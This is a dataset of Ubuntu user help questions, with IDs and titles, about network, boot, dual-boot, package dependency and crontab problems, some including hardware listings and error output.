335512	wired network problem in ubuntu 12.04.2 , ethernet controller- realtek pcie gbe family netwok controller	`` sudo lshw -c network '' , this command results into pci ( sysfs ) *-network description : network controller product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:16 memory:9a100000-9a103fff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 03 serial : c8:0a : a9:4c : dc:84 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168d-2.fw ip=70.70.70.78 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:42 ioport:4000 ( size=256 ) memory:94104000-94104fff memory:94100000-94103fff memory:94110000-9411ffff and `` lspci -nn '' this results into 00:00.0 host bridge [ 0600 ] : intel corporation core processor dram controller [ 8086:0044 ] ( rev 02 ) 00:01.0 pci bridge [ 0604 ] : intel corporation core processor pci express x16 root port [ 8086:0045 ] ( rev 02 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 5 series/3400 series chipset usb2 enhanced host controller [ 8086:3b3c ] ( rev 05 ) 00:1b.0 audio device [ 0403 ] : intel corporation 5 series/3400 series chipset high definition audio [ 8086:3b56 ] ( rev 05 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 1 [ 8086:3b42 ] ( rev 05 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 2 [ 8086:3b44 ] ( rev 05 ) 00:1c.4 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 5 [ 8086:3b4a ] ( rev 05 ) 00:1c.7 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 8 [ 8086:3b50 ] ( rev 05 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 5 series/3400 series chipset usb2 enhanced host controller [ 8086:3b34 ] ( rev 05 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev a5 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation mobile 5 series chipset lpc interface controller [ 8086:3b03 ] ( rev 05 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 5 series/3400 series chipset 6 port sata ahci controller [ 8086:3b2f ] ( rev 05 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 5 series/3400 series chipset smbus controller [ 8086:3b30 ] ( rev 05 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation g98m [ geforce g105m ] [ 10de:0a68 ] ( rev a2 ) 01:00.1 audio device [ 0403 ] : nvidia corporation high definition audio controller [ 10de:0be3 ] ( rev a1 ) 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 03 ) 04:00.0 firewire ( ieee 1394 ) [ 0c00 ] : jmicron technology corp. ieee 1394 host controller [ 197b:2380 ] 04:00.1 system peripheral [ 0880 ] : jmicron technology corp. sd/mmc host controller [ 197b:2382 ] 04:00.2 sd host controller [ 0805 ] : jmicron technology corp. standard sd host controller [ 197b:2381 ] 04:00.3 system peripheral [ 0880 ] : jmicron technology corp. ms host controller [ 197b:2383 ] 04:00.4 system peripheral [ 0880 ] : jmicron technology corp. xd host controller [ 197b:2384 ] ff:00.0 host bridge [ 0600 ] : intel corporation core processor quickpath architecture generic non-core registers [ 8086:2c62 ] ( rev 02 ) ff:00.1 host bridge [ 0600 ] : intel corporation core processor quickpath architecture system address decoder [ 8086:2d01 ] ( rev 02 ) ff:02.0 host bridge [ 0600 ] : intel corporation core processor qpi link 0 [ 8086:2d10 ] ( rev 02 ) ff:02.1 host bridge [ 0600 ] : intel corporation core processor qpi physical 0 [ 8086:2d11 ] ( rev 02 ) ff:02.2 host bridge [ 0600 ] : intel corporation core processor reserved [ 8086:2d12 ] ( rev 02 ) ff:02.3 host bridge [ 0600 ] : intel corporation core processor reserved [ 8086:2d13 ] ( rev 02 ) please help me , i have already spend too much time in reading blogs so that i can also find some solution to my problem . but i did n't find one .
335513	ubuntu 13.04 keeps freezing after latest update	i am running ubntu 13.04 64-bit . my laptop has a dual-core intel i5 processor , nvidia gt540m gpu , 4gb ram and a 60gb sata 3 ssd . after the most recent update it takes more than twice as long to boot and freezes within a minute of use . i have no problems with the windows 7 boot on the same machine . i have tried booting with older kernels , but they all suffer from the same problem .
335521	ubuntu for asus memo pad hd 7 ?	is it possible to install ubuntu on a asus memo pad hd 7 and to use the whole features of this os ? i can not find anything about ubuntu on asus memo pad hd 7 so i have to ask here . kiano
335523	ubuntu wont run because windows cant load after i reboot my computer	i recently downloaded ubuntu and after installing it and rebooting it the computer tells me windows failed to laod components have been erased or missing and insert your installation disk and press repair so what do i do is there another way out of this problem i currently run windows 8 os on a hp pavilion with a a4 amd processor at 2500 mhz and i downloaded and installed the 32 bit version of ubuntu linux ? please help if i have to buy the installation disk i will but i want to know if there are any other options .
335524	configure : error : unrecognized option : -–with-mail=/usr/bin/sendmail while installing nagios 3.5.0	following this installation guide when reach to the step : ./configure -- with-nagios-group=nagios -- with-command-group=nagcmd -–with-mail=/usr/bin/sendmail i got the following error : configure : error : unrecognized option : -–with-mail=/usr/bin/sendmail try `./configure -- help ' for more information . any idea why ? is save remove that last parameter ( -–with-mail=/usr/bin/sendmail ) and move on ? i did that for test and configure stage pass without error , but i 'm afraid of the implication and certainly after days in production i do n't want to have recompile nagios again ; )
335527	kernel panic after attempting to install glibc	i was installing glibc v2.18 and suddenly the install ( make install ) halts with an error . afterwards , any basic terminal commands ( ls , sudo , etc . ) and attempting to perform system operations ( shutdown , restart , etc . ) resulted in segmentation faults . i performed a hard restart of my system , and upon attempting to boot ubuntu , my machine displays the following : [ 2.297365 ] init [ 1 ] : segfault at 3cd ip 00000000000003cd sp 00007fffa0a7f468 error 14 in libc-2.15.so [ 7fecf93a4000+1b5000 ] [ 2.297640 ] kernel panic - not syncing : attempted to kill init ! exitcode=0x0000000b [ 2.297640 ] [ 2.297707 ] pid : 1 , comm : init not tainted 3.5.0-39-generic # 60~precise1-ubuntu [ 2.297766 ] call trace : [ 2.297814 ] [ < ffffffff8168500e > ] panic+0xc1/0x1d7 [ 2.297867 ] [ < ffffffff811198f0 > ] ? perf_adjust_period+0xb0/0xb0 [ 2.297923 ] [ < ffffffff81057582 > ] find_new_reaper+0x132/0x140 [ 2.297977 ] [ < ffffffff810589e5 > ] forget_original_parent+0x45/0x1a0 [ 2.298033 ] [ < ffffffff81058b57 > ] exit_notify+0x17/0x110 [ 2.298086 ] [ < ffffffff810593e5 > ] do_exit+0x1f5/0x480 [ 2.298138 ] [ < ffffffff81089814 > ] do_group_exit+0x44/0xa0 [ 2.298192 ] [ < ffffffff810698cb > ] get_signal_to_deliver+0x22b/0x440 [ 2.298249 ] [ < ffffffff810147e9 > ] do_signal+0x29/0x130 [ 2.298301 ] [ < ffffffff81685185 > ] ? printk+0x61/0x63 [ 2.298353 ] [ < ffffffff81144966 > ] ? vm_mmap_pgoff+0x96/0xb0 [ 2.298407 ] [ < ffffffff81155c63 > ] ? sys_mmap_pgoff+0x103/0x1f0 [ 2.298462 ] [ < ffffffff810149a0 > ] do_notify_resume+0x90/0xd0 [ 2.298516 ] [ < ffffffff8169e32c > ] retint_signal+0x48/0x8c i am unsure how to resolve the kernel panic and successfully boot ubuntu . if i can provide any further information , please do not hesitate to ask . thank you in advance for any assistance .
335530	can i download music files that i own to another computer from ubuntu one ?	i uploaded my music to ubuntu one . can i download it as files to another computer ?
335538	unknown user in statoverride file	i had an application installed on my htpc running ubuntu server called mediatomb , a few months ago i uninstalled it and replaced it with a plex install . at the weekend when querying existing users on the machine i noticed that the mediatomb user and group still existed so i used the command sudo deluser mediatomb to remove the user . a day or so later i went to install htop sudo apt-get install htop but i found that i was getting an error : syntax error : unknown user 'mediatomb ' in statoverride file . i thought i would just be able to open the statoverride file using nano and edit out any references to mediatomb but i was n't able to open the file correctly using nano . i ran a grep command grep 'mediatomb ' /var/lib/dpkg/statoverride which returned two locations in the file which do n't exist on the system anymore . the only way i am able to get around the issue for now is to re-create the user mediatomb and then everything works fine . obviously this is n't a good long-term solution . what i would like to know is , what is the statoverride file and why does it retain users in it which have been removed from the system ? am i removing the users in the wrong or deprecated way ?
335540	how to hide the panel 1 with key combination in xubuntu ?	i want to disable panel 1 ( the one that is at the bottom of the screen at default ) and have it only appear when i hit certain keys
335541	installing lubuntu on a uefi laptop	i 've recently purchased a lenovo ideapad s205 to replace my aging hp tc1100 . the device has windows 7 ( 64 bit ) pre-installed . i have no need to keep the os and have a backup image of the drive . however the problem arises when i attempt to install lubuntu 13.04 ( 64 bit ) . the install will fail with the following error message - '' the grub-efi package failed to install to /target/ . without the grub boot loader , the installed system will not boot . '' so i reboot , run the install media in live mode , install grub-efi via terminal , and then run the installer again . this time everything seems ok , the installer completes and i 'm prompted to reboot . however upon rebooting , the laptop fails to detect grub on the hard drive and moves onto the next item in the boot order . the laptop has a very basic uefi with no option to set it to bios/legacy mode or disable certain items in the boot order , and strangely ; when attempting to install the 32 bit variant of lubuntu 13.04 , the install media is not detected at all . from the looks of it , i have a full install ready to go , but the boot loader is not being picked up by the laptop . could anyone please advise on what i would need to do from here ?
335544	ca n't do anything with my ipad ( 3rd gen ) using 13.04	i 'm just trying to put new music on my ipad . i 've tried to get itunes to run using play on linux as well as wine . i 've also tried to add music with both banshee and rhythmbox . i ca n't make anything work , but through libimobiledevice i am able to dock it and see the files , but nothing more . i 'm sorry if this question has already been asked , but i ca n't find anything recent on the subject . also i have an iphone 4 and i 'm experiencing the same issue with it .
335546	black screen during boot after tty1 login	i 've got a weeks-young install of 13.04 ( 3.8.0.29 ) and the computer has been powered on for a week . i turned it off for the night and now it freezes during boot . i have already checked this seemingly mandatory post as well as this one but i could n't find a solution . this one also looked promising but i ca n't get my machine into read/write mode because recovery is n't working and drop to shell only gives me a read-only system . setting radeon.modeset=0 also ends in a freeze . at this point , my computer is completely unusable and i have to run off a livecd to write this question . how can i identify the problem , and how can i solve it ? this is not an nvidia problem , as the machine has a radeon hd 5450 card . iirc it 's running with fglrx ( not -updates and not built-in because then i would n't get my 1280x1024 resolution . as far as i recall , i have not fiddled with any bits , certainly none at the system- or device level . i assume that installing user apps like gimp ca n't have any impact . what happens : normal boot : brief purple screen , then a text-mode tty1 login prompt flashes on just before ubuntu ( tries to ) load the gui . except that now , the gui does n't arrive : the tty1 text-mode screen disappears , there 's an underscore cursor which does not blink , and then nothing more ever happens . neither ctrl-alt-del nor ctrl-alt-f2 or -f7 work . it seems frozen and requires a hardware reset . recovery boot : the grub screens take a long time to show ; i 'm used to the sub-screens being shown instantly but now there 's a delay of maybe 10-20 seconds before the `` advanced options '' screen is shown . no idea why , nor whether this is related to the boot problem . after loading the recovery mode : several of the recovery options start out with fsck , and i often get mountall : fsck /boot [ 1028 ] terminated with status 1 on the screen , and after that nothing more happens . sometimes i get clean response instead , but still nothing more happens . either way , the only keyboard input it will accept is ctrl-alt-del but this does not reboot the machine right away ! instead i see a graphical notice the system is running in low-graphics mode although ironically , this message is displayed at 1600x1200 pixels which my monitor ca n't handle so it puts its own warning message in the middle and i ca n't see the rest of the gui output . then , before i can react , it reboots . failsafex has the same problem as the normal boot : it simply freezes after tty1 . hitting ctrl-alt-f1 or -f2 or -f7 at various stages does n't do anything at all . this makes me think the machine is really frozen , rather than just working fine but without screen output . editing grub 's normal boot entry to remove splash quiet , and to add noapic nolapic nomodeset does n't help either . same situation . same also when doing that on the recovery mode 's boot entry . using the recovery mode to boot the previous kernel version ( 3.8.0.27 ) also has the exact same behavior .
335547	cryptkeeper 's icon not showing in panel in ubuntu 13.04	i installed `` cryptkeeper '' an hour ago , and i just cant get it 's icon to be shown in the panel . i 've tried running this code in the terminal : gsettings set com.canonical.unity.panel systray-whitelist `` [ 'all ' ] '' but the output was `` no such schema 'com.canonical.unity.panel ' `` . after searching a little , i discovered that the unity notification area ( systray ) whitelist is no longer available in ubuntu 13.04 . i also tried using `` dconf-tools '' , but it did n't help . i 've been searching quite a lot , and the only option , that i encountered , to get the icon to be shown in the panel is to get the unity systray whitelist back in ubuntu 13.04 . i am not sure that 's a good idea since it 's obsolete . any ideas would be appreciated .
335549	ubuntu 13.04 : ethernet works at office but not at home . dhcp issue maybe ?	i am fairly new to linux and just installed ubuntu 13.04 on an external usb hd ( using the livecd ) . the computer the drive is connected to is a dell precision m4500 ( laptop ) . after the fresh install , the wired ethernet connection does not work when i am at home . however , when i go into my office and connect to the wired ethernet network there , the wired connection does work . the result is the same before and after the initial software updates . also as another note , the wireless has never worked ... it shows nearby wireless connections that are available but when i try to connect to them , i just get an authentication prompt over and over ( or at home , there is no authentication prompt [ wpa2 passcode is set ] , it just tries to connect and then fails and tries again in a loop ) . all that to say , when i go home later and check to see if there are answers , i will not have internet on the linux machine . my best guess is that it is a dhcp issue with ubuntu but i have no idea where to begin . please let me know what logs or other information is needed to diagnose ( although without internet , it 's a little hard to copy and paste ) . as another note , when i boot the laptop into windows 7 , the wired connection works fine at home ( not a bad router/cable ... able to obtain an ip address , etc ) . thanks
335550	how to install ubuntu on a laptop alongside windows vista ?	i have windows vista 64 bit with a free d : drive that has nothing on it . how do i install ubuntu dual boot the drive is formatted but did i do it right ? how can i tell ?
335557	problem with dependencies while installing ubuntu-sdk	i get this error while installing ubuntu-sdk on clean install of ubuntu 13.04 64bit : szymon @ szymon-pc : ~ $ sudo apt-get install ubuntu-sdk [ sudo ] password for szymon : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . ubuntu-sdk : depends : qtcreator-plugin-ubuntu but it is not going to be installed depends : qtcreator-plugin-ubuntu-cordova but it is not going to be installed e : unable to correct problems , you have held broken packages . any ideas ? output of sources.list # deb cdrom : [ ubuntu 13.04 _raring ringtail_ - release amd64 ( 20130424 ) ] / raring main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //gb.archive.ubuntu.com/ubuntu/ raring main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //gb.archive.ubuntu.com/ubuntu/ raring-updates main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //gb.archive.ubuntu.com/ubuntu/ raring universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring universe deb http : //gb.archive.ubuntu.com/ubuntu/ raring-updates universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //gb.archive.ubuntu.com/ubuntu/ raring multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring multiverse deb http : //gb.archive.ubuntu.com/ubuntu/ raring-updates multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //gb.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb http : //gb.archive.ubuntu.com/ubuntu/ raring-security main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring-security main restricted deb http : //gb.archive.ubuntu.com/ubuntu/ raring-security universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring-security universe deb http : //gb.archive.ubuntu.com/ubuntu/ raring-security multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ raring-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu raring partner # deb-src http : //archive.canonical.com/ubuntu raring partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu raring main deb-src http : //extras.ubuntu.com/ubuntu raring main output of apt-get install qtcreator-plugin-ubuntu qtcreator-plugin-ubuntu-cordova ubuntu-sdk reading package lists ... building dependency tree ... reading state information ... some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . qtcreator-plugin-ubuntu : depends : qtcreator-plugin-ubuntu-common but it is not going to be installed qtcreator-plugin-ubuntu-cordova : depends : qtcreator-plugin-ubuntu-cordova-common but it is not going to be installed recommends : cordovamobilespec but it is not installable recommends : cordovaqt-runtime but it is not installable output of apt-cache depends ubuntu-sdk qtcreator-plugin-ubuntu-cordova qtcreator-plugin-ubuntu & & apt-cache policy ubuntu-sdk qtcreator-plugin-ubuntu-cordova qtcreator-plugin-ubuntu -cordova qtcreator-plugin-ubuntu ubuntu-sdk depends : click depends : click-dev depends : click-doc depends : cordova-ubuntu-2.8 depends : cordova-ubuntu-2.8-dev depends : cordova-ubuntu-2.8-examples depends : libqt5qml-graphicaleffects depends : libqt5sql5-sqlite depends : libqt5svg5-dev depends : libqt5v8-5-dev depends : libqt5webkit5-dev depends : libqt5xmlpatterns5-dev depends : qmlscene qmlscene : i386 depends : qt3d5-dev depends : qt5-default depends : qtbase5-dev depends : qtcreator depends : qtcreator-plugin-ubuntu depends : qtcreator-plugin-ubuntu-cordova depends : qtdeclarative5-cordova-2.8-plugin depends : qtdeclarative5-dev depends : qtdeclarative5-dev-tools qtdeclarative5-dev-tools : i386 depends : qtdeclarative5-ubuntu-ui-toolkit-plugin depends : qtlocation5-dev depends : qtmultimedia5-dev depends : qtscript5-dev depends : qtsensors5-dev depends : qttools5-dev depends : qttools5-dev-tools depends : ubuntu-html5-theme depends : ubuntu-ui-toolkit-examples depends : ubuntu-ui-toolkit-theme ubuntu-ui-toolkit-theme : i386 recommends : libqt5webkit5-qmlwebkitplugin recommends : qtdeclarative5-folderlistmodel-plugin recommends : qtdeclarative5-localstorage-plugin recommends : qtdeclarative5-particles-plugin recommends : qtdeclarative5-qtaudioengine-plugin recommends : qtdeclarative5-qtmultimedia-plugin recommends : qtdeclarative5-qtquick2-plugin recommends : qtdeclarative5-qtsensors-plugin recommends : qtdeclarative5-window-plugin recommends : qtdeclarative5-xmllistmodel-plugin conflicts : ubuntu-sdk : i386 qtcreator-plugin-ubuntu-cordova depends : qtcreator-plugin-ubuntu-cordova-common depends : qtcreator-plugin-ubuntu recommends : < cordovamobilespec > recommends : < cordovaqt-runtime > conflicts : qtcreator-plugin-cordovaqt conflicts : qtcreator-plugin-cordovaqt : i386 replaces : qtcreator-plugin-cordovaqt qtcreator-plugin-ubuntu-cordova replaces : qtcreator-plugin-cordovaqt : i386 qtcreator-plugin-ubuntu-cordova : i386 conflicts : qtcreator-plugin-ubuntu-cordova : i386 qtcreator-plugin-ubuntu depends : qtcreator-plugin-ubuntu-common depends : ubuntu-ui-toolkit-doc depends : ubuntu-ui-toolkit-examples depends : android-tools-adb depends : dh-make depends : ubuntu-html5-theme depends : click depends : qtcreator conflicts : < ubuntu-qtcreator-plugins > conflicts : < ubuntu-qtcreator-plugins : i386 > replaces : < ubuntu-qtcreator-plugins > qtcreator-plugin-ubuntu replaces : < ubuntu-qtcreator-plugins : i386 > qtcreator-plugin-ubuntu : i386 conflicts : qtcreator-plugin-ubuntu : i386 ubuntu-sdk : installed : ( none ) candidate : 1.009~sdkppa~raring1~test6 version table : 1.009~sdkppa~raring1~test6 0 500 http : //ppa.launchpad.net/ubuntu-sdk-team/ppa/ubuntu/ raring/main amd64 packages 1.004 0 500 http : //gb.archive.ubuntu.com/ubuntu/ raring/universe amd64 packages qtcreator-plugin-ubuntu-cordova : installed : ( none ) candidate : 2.7.1-0ubuntu1~raring1~test18 version table : 2.7.1-0ubuntu1~raring1~test18 0 500 http : //ppa.launchpad.net/ubuntu-sdk-team/ppa/ubuntu/ raring/main amd64 packages qtcreator-plugin-ubuntu : installed : ( none ) candidate : 2.7.1-0ubuntu1~raring1~test18 version table : 2.7.1-0ubuntu1~raring1~test18 0 500 http : //ppa.launchpad.net/ubuntu-sdk-team/ppa/ubuntu/ raring/main amd64 packages 2.7.0-0ubuntu3 0 500 http : //gb.archive.ubuntu.com/ubuntu/ raring/universe amd64 packages
335561	how to display last 10 logins into the system ?	i used last to display last 10 logins , but it displays me all of them . any ideas ? cheers
335568	ca n't boot from usb , windows xp to ubuntu	i 've been trying to install ubuntu on my hp desktop running windows xp , and i ca n't seem to boot from a usb flash drive . i press esc at the boot menu and select the proper usb , but all i get is a weird command screen .
335569	how to assign a non working key to another key ?	my laptop 's `` m '' key does n't work anymore and i want to know how to re-map it . in example : to make it work with the altgr or any other key that i do n't use that much . greetings . p.s . ubuntu is working normally but the `` m '' key is broken in my keyboard so i have to copy/paste it in order to write and it is tedious . thanks in advance for your help .
335571	how do i tell the `date` command to only show the time ?	i am trying to display only the current time using `` date '' , not all that information day , month , year etc.. , only the current time . i.e . : 13:45 or 1:45pm any ideas ?
335572	does magic jack work on ubuntu ?	does magic jack work with ubuntu ? i originally had my magic jack on a computer with windows xp and i decided to switch to ubuntu but i still want magic jack .
335582	question about dual-booting 13.04 and windows 8/8.1	so , after learning that in order to boot into ubuntu from a usb drive , i had to go into my bios and change the boot setting from uefi to legacy , i managed to install ubuntu 13.04 . now , when i restart my laptop , it pops up the grub menu thing , and i can load ubuntu no problem . but if i try to select windows , i get an error saying windows ca n't be booted , and i need the recovery disc to repair this . but , since i do n't have one , i thought it 'd be a good idea to look around the boot settings again . changing the boot settings from legacy back to uefi lets me boot into windows normally , but there is no option to get into ubuntu unless i change it back to legacy , which locks me out of windows again . my question is , how can i make these options bot available to me without having to mash f2 to get into the bios every time i want to change my os ? thank you in advance .
335583	how do i selectively install a package from a ppa ?	there is an updated package ( coreutils ) in a ppa that i am interested in installing on my server . i added the ppa with : sudo add-apt-repository ppa : dns/gnu in addition to coreutils , this ppa has a number other packages that i may not want to install . is there a way to configure apt such that only coreutils will get updated from this ppa ? ubuntu 13.04 if that matters . thanks .
335585	linux mint install failed , trying ubuntu 13.04	i tried to install linux mint 15 on a windows 8 laptop . the install went fine , but after rebooting , all i got was a command line . after spending most of the day dealing with that unsuccessfully , i 'm going with a ubuntu 13.04 install . i 'm a new linux/ubuntu user , and was wondering if i will have the same problem . also can it be because of the secure boot in the bios being enabled ? the boot options in the bios are set correctly ( hdd , dvd rom , usb drive , etc. ) . thank you for any help you can offer me .
335591	have an application open in the workspace it was originally opened in	when i open an application in workspace1 and then change to workspace2 before the application finishes loading , it will open in workspace2 . i want it to open in workspace1 , where i opened it . how would i do this ?
335592	how to display time elapsed since last system boot using `` uptime '' ?	i want to display time elapsed since last system boot using `` uptime '' command , but i do n't want it to display all that info , i just want to display how many hours passed since last system boot ( i.e . : 18:17:59 ) thanks
335595	which version of ubuntu for mac ?	the download page only mentions desktop pcs , so what version do i get for a mac ?
335596	can i make user list in empathy more compressed ?	can i make user list in empathy more compressed ? i thought pidgin 's list is too lax , but empathy is even more so . for comparison , here 's empathy for ubuntu ( left ) and qip for windows ( right ) :
335597	ubuntu 12.04 lts install failed . swap partition failed	i recently was lucky enough to get a laptop for free . the only setback is it had no operating system . i burned ubuntu 12.04 lts to a disk , and when i boot it in the laptop it loads . i tried installing it a few times , but during the installing process it says there was an input/output error . so after hitting retry a few times it still didnt work so i clicked ignore . while the actual installing process happens it says failed to create swap partition . i dont have any other os on it nor do i think i will ( besides ubuntu ) . if anybody knows how to fix these errors i would be extremely happy . thank you in advance for your help
335602	how can i update ubuntu if i `` missed my chance '' ?	when the new 13.04 became available i had no internet . still , it appeared on my update manager ( not relevant , but how ? ) . when i got internet back and opened the update manager the button to update to 13.04 was nowhere to be found . how can i install the 13.04 now ?
335607	how to display a message each time eth1 is enabled ?	how can i display a message like : eth1 interface has been enabled each time when eth1 is enabled ? let me know if my question make sense .
335609	where do i report issues with official archive mirrors ?	apt-get has been failing to retrieve two files from german archive mirror de.archive.ubuntu.com for some days : hit http : //de.archive.ubuntu.com saucy/universe amd64 packages hit http : //de.archive.ubuntu.com saucy/multiverse amd64 packages [ ... ] err http : //de.archive.ubuntu.com saucy/universe i386 packages 406 not acceptable [ ip : 141.30.13.20 80 ] err http : //de.archive.ubuntu.com saucy/multiverse i386 packages 406 not acceptable [ ip : 141.30.13.20 80 ] [ ... ] w : failed to fetch http : //de.archive.ubuntu.com/ubuntu/dists/saucy/universe/binary-i386/packages 406 not acceptable [ ip : 141.30.13.20 80 ] w : failed to fetch http : //de.archive.ubuntu.com/ubuntu/dists/saucy/multiverse/binary-i386/packages 406 not acceptable [ ip : 141.30.13.20 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . whom should i report this issue to ?
335613	i am trying to download ubuntu onto a usb , but when i press browse on the usb linux downloader the file for ubuntu does n't show up	how do i download ubuntu onto my usb ? i read the instructions , but it still does n't work because the file is n't showing up when i press browse .
335615	does ubuntu support `` @ reboot '' in crontab	does ubuntu support `` @ reboot '' in crontab ? i find documentation suggesting it is supported , but web chatter asserts it is not . i can not make the @ reboot section work . the `` after midnight '' section works fine . here is the test example from my /etc/crontab : $ cat /etc/crontab # /etc/crontab : system-wide crontab shell=/bin/sh path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin # m h dom mon dow user command 17 * * * * root cd / & & run-parts -- report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.monthly ) # # # # in the beginning - @ reboot /var/kiosk/btest.sh # after midnight 30 0 * * * root /etc/cron.daily/kiosk/kioskreboot.sh # end of crontab now the shell script btest.sh : # ! /bin/bash date > /var/kiosk/startflag.txt echo we booted > > /var/kiosk/startflag.txt date echo we booted and the permissions : $ pwd /var/kiosk $ ls -l btest.sh -rwxrwxrwx 1 root root 147 aug 21 15:19 btest.sh $ ls -ld drwxrwxrwx 14 laptopsanytime root 4096 aug 21 16:30 .
335624	a partition is necessary before installing ubuntu on windows 7 ?	im trying to install ubuntu on my pc that runs windows 7 . do i need to make a partition before installation ?
335641	steam dose n't start , an x error occured	whenever i try to run steam , it does n't open , but it does n't give an error message . running it through the consle , i get this ... running steam on ubuntu 12.04 32-bit steam_runtime is enabled automatically ilocalize : :addfile ( ) failed to load file `` public/steambootstrapper_english.txt '' . [ 2013-08-21 21:24:50 ] startup installing breakpad exception handler for appid ( steam ) /version ( 0_client ) steamupdateui : an x error occurred x error of failed request : badalloc ( insufficient resources for operation ) i am sure my computer meets the requirements , and steam works on my windows partition . also , i am running ubuntu 12.04 , in unity 2d
335643	youtube videos run very slowly	i am primarily a windows user . i 'm dual-booting ubuntu 13.04 using wubi and i 've noticed that youtube is much slower on ubuntu than it is on windows in the same network ... like a lot slower . i find that windows typically loads 720p faster than ubuntu does 240p , and sometimes even 144p is n't fast enough . i know this should n't be a problem , but unfortunately - being fairly new to linux - i lack the technical expertise to solve this issue . i 've already tried html5 with no observable results , but the problem persists independent of what browser i 'm using . if anyone has a solution , i would much appreciate a noob-friendly explanation .
335644	how do i install qttest for the ubuntu sdk ?	when i select `` build - > ubuntu touch - > create application package '' in the ubuntu sdk , the build fails with the error `` fail ! : qmltestrunner : :tst_hellocomponent : :compile ( ) module `` qttest '' is not installed '' . how can i install the qttest module so that i can build a package ?
335647	latest update break ability to log in	i am running ubuntu 12.04.3 on a 64-bit machine with an nvidia graphics card . today i installed updates which included updates to one of the nvidia packages . after it got done building the new modules with dkms i logged out but could not get the greet . so i rebooted and was thrown to a command line . if i tried to restart lightdm from /etc/init.d/lightdm i was just shown the boot logging screen . if i tried to run start lightmd i just got `` restart : unknown instance : '' so i uninstalled nvidia-* and then installed nvidia-common nvidia-settings and nvidia-304 . finally i ran sudo nvidia-xconfig . after it installed and i rebooted i can now get the lightdm greet . however , no matter which desktop i choose the screen just goes black and then brings me back to the greeter . i have tried unity , unity-2d , gnome , and gnome classic ( no effects ) all with the same result . i do not see any problems reported in /var/log/lightdm/lightdm.log , however /var/log/lightdm/x-0-greeter-log does show the following , which i am not 100 % sure is relevant . [ +0.96s ] critical : ido_calendar_menu_item_set_date : assertaion 'ido_is_calendar_menu_item ( menuitem ) ' failed
335649	resolution problem	why does the desktop text become small and unreadable when i update video drivers . once it 's done i ca n't fix it . i have to reinstall and go back to the beginning .
335653	grub not showing windows 7	i recently installed ubuntu to my harddrive and now i can only boot to ubuntu , windows 7 does not show up , please help .
